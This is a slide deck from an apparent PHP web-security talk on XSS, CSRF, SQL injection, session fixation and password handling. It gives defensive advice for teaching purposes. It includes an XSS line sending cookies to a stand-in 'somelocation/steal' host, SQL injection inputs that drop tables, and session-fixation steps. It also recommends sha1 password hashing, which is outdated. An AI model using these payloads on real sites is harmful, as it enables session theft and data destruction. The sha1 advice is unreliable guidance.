Tweet
Tweet

Slide 1

Slide 1 text

Security 101 How not to get hacked

Slide 2

Slide 2 text

Who Am I • Systems Architect @ Discovery Communications. • Previous Speaker @ Atlanta PHP, Zendcon. • Previously worked on NationalGuard.com’s recruitment application (Security Clearance and all.)

Slide 3

Slide 3 text

Who knows this guy?

Slide 4

Slide 4 text

Kevin Mitnick One of the most famous hackers ever, or was he?

Slide 5

Slide 5 text

Kevin Mitnick • Hacked IBM, Motorola, DEC, Nokia, Sun Microsystems, Fujitsu Siemens. (Confirmed) • Hacked Pacific Bell, California DMV, FBI, Pentagon. (Alleged)

Slide 6

Slide 6 text

SOCIAL ENGINEERING • Phishing - Getting information by simply asking for it. • Baiting - Leaving infected media (USB Stick, CD’s, wireless networks, etc) that compromises a system. • Tailgating - Entering a secured area by following someone.

Slide 7

Slide 7 text

So why talk Social Engineering?

Slide 8

Slide 8 text

Social Engineering - Tips • Don’t give out privileged information, ever. • Know who you’re talking to, ask to call them back, etc. • Common Sense helps a lot. • Never take anything for granted. • Don’t pick up disks/ usb sticks/etc & insert them into your computer (PC, Mac, or even Linux)

Slide 9

Slide 9 text

So what is security?

Slide 10

Slide 10 text

Security is a Mindset • Three Principles: • Defense in Depth • Least Privilege • Least complicated • Trust Nothing, Assume Nothing. Defense in Depth - Redundant safeguards are valuable. Least Privilege - Grant as little Freedom as possible Least Complicated - Complexity breeds mistakes. (From Shiflett’s Evolution of Web Security)

Slide 11

Slide 11 text

Security In Practice • Working with Data has two practices: • Filter Input • Escape Output • Working with People has many many more!

Slide 12

Slide 12 text

Server Security http://flic.kr/p/9SD2tZ by Rob Allan (Akrabat) This is actually Ed Finkler, he used to run the Spaz project and is a member of several other open source projects. Because of the context though most will assume he’s a hacker, this is called pre-texting.

Slide 13

Slide 13 text

Server Side Security • Install Suhosin patch. • Be smart about your passwords. • Disable register globals, magic quotes, etc. • Never run PHP/Apache/Nginx/etc as administrator. • Keep up with Patches. This is a long topic, I’m not going to fully cover it. If you don’t know what you’re doing, PLEASE hire a sysadmin. Sysadmin’s need love too!

Slide 14

Slide 14 text

Server Side Security Only True Security Option: Unplug machine from internet, telephone, power, etc and never power it back on.

Slide 15

Slide 15 text

What we’re all here for

Slide 16

Slide 16 text

Top Vulnerabilities for Web apps • Cross Site Scripting • 68% • Unintentional Disclosure • 66% • Session Fixation / Hijacking • 53% • Sql Injection • 32% Data according to Veracode State of Software Security v4. Sample group is 9910 apps.

Slide 17

Slide 17 text

Cross Site Scripting (XSS) • Inclusion of Dynamic Code via unfiltered method of entry. • Can be one time (get parameter/post parameter.) • Can be permanent (blog post, blog comment, forum post, etc.)

Slide 18

Slide 18 text

An Examples --- url?user=%3Cscript%3E%2F%2FDo %20Something%3C%2Fscript%3E or user = //Do Something//Do Something"; ?>

Slide 19

Slide 19 text

Whoa • If this were a crafted link, 1 person could be exploited. • If this is stored in a forum/blog, many people could be exploited.

Slide 20

Slide 20 text

The Danger? cookies --- document.location = 'http:// somelocation/steal/?cookie=' + encodeURI( document.cookie ) form data --- getElementById('form').target = http://somelocation/stealform

Slide 21

Slide 21 text

XSS Prevention • Filter Input using strip_tags. • Filter Output using htmlspecialchars.

Slide 22

Slide 22 text

Special Chars --- url?user=%3Cscript%3EDo%20Something%3C %2Fscript%3E or user = Do Something

Slide 23

Slide 23 text

Strip Tags --- url?user=%3Cscript%3EDo%20Something%3C %2Fscript%3E or user = Do Something

Slide 24

Slide 24 text

CSRF - Cross Site Request Forgeries • Uses your own login / cookies/ sessions /etc against you. • Makes requests in the back end (that have side effects) without your knowledge. • Can be done by a malicious site, or, via XSS.

Slide 25

Slide 25 text

Prevention • Prevent CSRF on your forms by: • Using Tokens.

Slide 26

Slide 26 text

Using Tokens on your Forms " /> --- if ($_POST['token'] != $_SESSION['token']) { // ABORT ABORT }

Slide 27

Slide 27 text

SQL Injection http://xkcd.com/327/

Slide 28

Slide 28 text

What is SQL Injection? • Allowing arbitrary SQL statements to alter the intended “flow” of your query. • Can change your conditions in unexpected ways -- admin’ or 1 = 1; -- • Can do actions -- admin’; drop table stuff; --

Slide 29

Slide 29 text

Some Insecure Code url?userid=42 SELECT * FROM users WHERE userid = '42';

Slide 30

Slide 30 text

So why is it insecure? url?userid=42'%3B%20drop%20table%20users%3B %20-- OR userid = 42' drop table users; -- SELECT * FROM users WHERE userid = '42'; drop table users;-- ';

Slide 31

Slide 31 text

Some Alternatives • Specific to this example: • Cast to integer. • Otherwise: • Filter Input. • Use Prepared Statements. • mysql_real_escape_string.

Slide 32

Slide 32 text

Cast to Int url?userid=42'%3B%20drop%20table%20users%3B %20-- OR userid = 42' drop table users; -- SELECT * FROM users WHERE userid = '42';

Slide 33

Slide 33 text

Filtering url?userid=42'%3B%20drop%20table%20users%3B %20-- OR userid = 42' drop table users; -- SELECT * FROM users WHERE userid = '42';

Slide 34

Slide 34 text

Prepared Statements url?userid=42'%3B%20drop%20table%20users%3B %20-- OR userid = 42' drop table users; -- prepare("SELECT * FROM users WHERE userid = :userid"); $stmt->execute(array(':userid' => $_GET['userid'])); $result = $stmt->fetchAll(); ?> SELECT * FROM users WHERE userid = :userid;

Slide 35

Slide 35 text

Tying it all together url?userid=42'%3B%20drop%20table%20users%3B %20-- OR userid = 42' drop table users; -- prepare("SELECT * FROM users WHERE userid = :userid"); $stmt->execute(array(':userid' => $userid)); $result = $stmt->fetchAll(); ?> SELECT * FROM users WHERE userid = :userid;

Slide 36

Slide 36 text

A note on Pagination • Set limits, make sure you’re not above your limit. • This is a DDOS attack vector, not setting a limit or too large of a limit can put additional strain on your application & database servers.

Slide 37

Slide 37 text

Session Fixation • Various ways to do this. • Send someone a link with a Session ID, the server will generate that Session. • Figure out the session identifier generation pattern and change sessions.

Slide 38

Slide 38 text

Usual Code for Session Fixation

Slide 39

Slide 39 text

How is this exploited? • Send target url with PHPSESSIONID=someknownstring • Target accesses url, signs in. • Access url you sent target. • Profit.

Slide 40

Slide 40 text

How can it be prevented • Regenerate the Session ID on changes to permission levels. We’ll look at other ways of handling this in another section.

Slide 41

Slide 41 text

Session Fixation Prevention

Slide 42

Slide 42 text

Session Hijacking • Guessing someone’s session id. • Grabbing their cookie (think xss). • Someone sharing a link with the PHPSESSIONID on it.

Slide 43

Slide 43 text

How to Prevent Hijacking • Fingerprint the User Agent • Use a Token.

Slide 44

Slide 44 text

Fingerprint the UA

Slide 45

Slide 45 text

Using a Token

Slide 46

Slide 46 text

Fun with Remote Code Includes • PHP by DEFAULT allows remote url includes.

Slide 47

Slide 47 text

A Quick Example

Slide 48

Slide 48 text

How to fix • Set allow_url_include to off. • Maybe set allow_url_fopen to off. • Quit doing it wrong.

Slide 49

Slide 49 text

Fix the Underlying Problem

Slide 50

Slide 50 text

Some Do’s before Pizza & Beer

Slide 51

Slide 51 text

Sanitizing Input • Use strip_tags before storing data or processing it out. • Cast Data to it’s type if you’re not working with strings. • (int) $number • (bool) $condition • Do this on things that are not being fed from $GET/$POST you never know when you’ll change that.

Slide 52

Slide 52 text

Escaping Output • Use htmlspecialchars to convert < to > • Be aware of where you’re getting the data.

Slide 53

Slide 53 text

On Passwords • Never store plaintext. • if (sha1($_POST[‘pass’]) === $db_return) • Salting is awesome. • if (sha1(‘sa’ . $_POST[‘pass’] . ‘lt) === $db_return)

Slide 54

Slide 54 text

On Password Complexity http://xkcd.com/936/

Slide 55

Slide 55 text

On Password Complexity • Military Standard is Strong - 15 ~68.5 bits of entropy • 15 chars long. • 2 upper case, 2 lower case letters. • 2 numbers. • 2 special characters.

Slide 56

Slide 56 text

Some Important things. • Filter Input & Escape Output, always. • Use prepared statements, filter your query params. • Disable magic_quotes, register_globals, allow_url_fopen. • Give minimum permissions to daemons, processes, people. • Regenerate your session id’s and use tokens. • Use common sense.

Slide 57

Slide 57 text

Thanks